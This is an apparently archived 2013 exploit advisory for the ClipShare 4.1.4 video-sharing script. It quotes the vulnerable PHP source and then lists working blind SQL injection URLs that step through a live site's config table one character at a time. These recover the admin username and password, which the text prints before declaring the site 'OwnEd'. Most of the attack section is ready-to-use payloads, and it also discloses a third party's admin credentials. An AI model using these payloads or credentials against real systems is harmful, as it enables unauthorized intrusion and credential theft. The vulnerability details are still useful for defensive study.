ClipShare 4.1.4 SQL Injection / Plaintext Password

2013-03-14T00:00:00
ID PACKETSTORM:120792
Type packetstorm
Reporter Akastep
Modified 2013-03-14T00:00:00

Description

                                        
                                            `=====================================================================  
Vulnerable Software: ClipShare - Video Sharing Community Script 4.1.4  
Official site: http://www.clip-share.com  
Software License: Commercial.  
Vulns: Blind SQl injection && Plaintext Password.  
======================================================================  
AFAIK all versions is vulnerable:  
Official Demo is also vulnerable: http://www.clipsharedemo.com/ugroup_videos.php?urlkey=%27%20and%203=%273  
Last Checked: 13 March 2013  
  
NOTE:To exploit this vulnerability MAGIC_QUOTES_GPC directive must be turned off on server side.(php.ini)  
Vulnerable Script:  
//ugroup_videos.php  
=========================== BEGIN OF ugroup_videos.php =============================================  
<?php  
/**************************************************************************************************  
| Software Name : ClipShare - Video Sharing Community Script  
| Software Author : Clip-Share.Com / ScriptXperts.Com  
| Website : http://www.clip-share.com  
| E-mail : office@clip-share.com  
|**************************************************************************************************  
| This source file is subject to the ClipShare End-User License Agreement, available online at:  
| http://www.clip-share.com/video-sharing-script-eula.html  
| By using this software, you acknowledge having read this Agreement and agree to be bound thereby.  
|**************************************************************************************************  
| Copyright (c) 2006-2007 Clip-Share.com. All rights reserved.  
|**************************************************************************************************/  
  
require('include/config.php');  
require('include/function.php');  
  
$urlkey = ( isset($_REQUEST['urlkey']) ) ? $_REQUEST['urlkey'] : NULL;  
$uid = ( isset($_REQUEST['UID']) && is_numeric($_REQUEST['UID']) ) ? $_REQUEST['UID'] : NULL;  
  
$sql="SELECT * from group_own WHERE gurl='" .$urlkey. "' limit 1";  
$rs = $conn->Execute($sql);  
if($rs->recordcount()>0) {  
STemplate::assign('groupname',$rs->fields[gname]);  
//PAGING STARTS  
$page = ( isset($_REQUEST['page']) && is_numeric($_REQUEST['page']) ) ? $_REQUEST['page'] : NULL;  
$sql = "SELECT count(*) as total from group_mem WHERE GID='" .$rs->fields['GID']. "' limit 1";  
$ars = $conn->Execute($sql);  
$total = ( $ars->fields['total']<=$config['total_per_ini'] ) ? $ars->fields['total'] : $config['total_per_ini'];  
$tpage = ceil($total/$config['items_per_page']);  
$spage = ( $tpage == 0 ) ? $tpage+1 : $tpage;  
$startfrom = ($page-1)*$config['items_per_page'];  
$sql = "SELECT m.*,s.addtime from group_mem as m,signup as s WHERE m.MID=s.UID and m.GID='".$rs->fields['GID']."' limit $startfrom, " .$config['items_per_page'];  
$rs = $conn->execute($sql);  
if($rs->recordcount()>0)  
$vdo = $rs->getrows();  
$start_num = $startfrom+1;  
$end_num = $startfrom+$rs->recordcount();  
$page_link = '';  
$type = ( isset($_REQUEST['type']) && $_REQUEST['type'] != '' ) ? "&type=" .$_REQUEST['type'] : NULL;  
for ( $k=1;$k<=$tpage;$k++ )  
$page_link.="<a href='group_members.php?UID=" .$uid. "&page=" .$k. $type. "'>$k</a>  ";  
//END PAGING  
}  
  
STemplate::assign('err',$err);  
STemplate::assign('msg',$msg);  
STemplate::assign('page',$page);  
STemplate::assign('start_num',$start_num);  
STemplate::assign('end_num',$end_num);  
STemplate::assign('page_link',$page_link);  
STemplate::assign('total',$total);  
STemplate::assign('answers',$vdo);  
STemplate::assign('head_bottom',"grouplinks.tpl");  
STemplate::display('head1.tpl');  
STemplate::display('err_msg.tpl');  
STemplate::display('ugroup_members.tpl');  
STemplate::display('footer.tpl');  
STemplate::gzip_encode();  
?>  
  
  
====================END OF ugroup_videos.php========================  
Real exploitation example:  
  
_REMOVED_/ugroup_videos.php?urlkey=1' order by 14-- 3='3  
  
  
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(5=5,0,3))-- 3='3  
  
  
//ON TRUE  
//RETURNS: NORMAL PAGE  
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(5=5,0,3))-- 3='3  
  
//ON FALSE  
// RETURNS NOTHING.(White Page)  
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(5=2,0,3))-- 3='3  
  
  
  
  
Plaintext password:  
//siteadmin/login.php  
============ BEGIN OF siteadmin/login.php ===========================  
<?php  
include('../include/config.php');  
  
if ( isset($_POST['submit_login']) ) {  
$username = trim($_POST['username']);  
$password = trim($_POST['password']);  
  
if ( $username == '' or $password == '' ) {  
$err = 'Please provide a username and password!';  
} else {  
$access = false;  
$sql = "SELECT soption FROM sconfig WHERE soption = 'admin_name' AND svalue = '" .mysql_real_escape_string($username). "'";  
$conn->execute($sql);  
if ( $conn->Affected_Rows() == 1 ) {  
$sql = "SELECT soption FROM sconfig WHERE soption = 'admin_pass' AND svalue = '" .mysql_real_escape_string($password). "'";  
$conn->execute($sql);  
if ( $conn->Affected_Rows() == 1 ) {  
$access = true;  
}  
}  
// SNIP //  
============ END OF siteadmin/login.php ===========================  
  
  
  
//TRUE  
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(count(`svalue`)!=0,0,3) from sconfig)-- 3='3  
  
  
80 user: http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(count(`svalue`)=80,0,3) from sconfig)-- 3='3  
  
  
  
  
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(count(0)=1,0,3) from sconfig where soption='admin_name')-- 3='3  
  
  
Passi cekirik:  
  
  
  
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(length(svalue)='11',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3  
  
11 simvolludur pass.  
  
  
========================================================  
  
1-ci simvol: o  
  
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,1,1)='o',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3  
  
  
========================================================  
2-ci simvol: (  
  
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,2,1)='(',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3  
  
========================================================  
3-cu simvol: 2  
  
  
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,3,1)='2',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3  
  
========================================================  
  
4-cu simvol: n  
  
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,4,1)='n',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3  
  
========================================================  
  
5-ci simvol: @  
  
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,5,1)='@',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3  
  
  
========================================================  
  
6-ci simvol: b  
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,6,1)='b',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3  
  
========================================================  
  
7-ci simvol: % (yoxla sonra)  
  
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,7,1)='%',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3  
  
  
========================================================  
  
8-ci simvol: h  
  
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,8,1)='h',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3  
  
========================================================  
  
9-cu simvol: a  
  
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,9,1)='a',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3  
  
  
========================================================  
  
10-cu simvol: 5  
  
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,10,1)='5',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3  
  
========================================================  
11-ci simvol: 1  
  
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,11,1)='1',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3  
  
========================================================  
  
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,1,15)='o(2n@b%ha51',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3  
  
  
  
  
  
  
//Parol duzdur tamamile ascii representasionu yoxlamaga ehtiyyac yoxdur.(plaintext oldugundan subhe yaradirdi)  
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,1,15)=0x6F28326E40622568613531,0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3  
  
pass: o(2n@b%ha51  
  
  
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(svalue='admin',0,3) from sconfig where soption='admin_name' limit 1 offset 0)-- 3='3  
  
login: admin  
pass: o(2n@b%ha51  
  
  
http://_REMOVED_/siteadmin/  
  
OwnEd.  
Tested version:  
Tuesday, March 12, 2013 | Version: 4.1.4 | Username: admin | Logout  
Copyright © 2006-2008 ClipShare. All rights reserved.  
  
=========================================  
KUDOSSSSSSS  
=========================================  
packetstormsecurity.org  
packetstormsecurity.com  
packetstormsecurity.net  
securityfocus.com  
cxsecurity.com  
security.nnov.ru  
securtiyvulns.com  
securitylab.ru  
secunia.com  
securityhome.eu  
exploitsdownload.com  
osvdb.com  
websecurity.com.ua  
1337day.com  
itsecuritysolutions.org  
waraxe.us  
  
El sallayin :D  
ottoman38 & Ferid23 & Metaizm &HERO_AZE & BOT_25 &CAMOUFL4G3  
4R!F * Orxan_204 & & SEXAVET & Manifesto & J_OF_R &  
& etc.  
===========================================  
  
/AkaStep  
  
  
  
  
  
  
  
`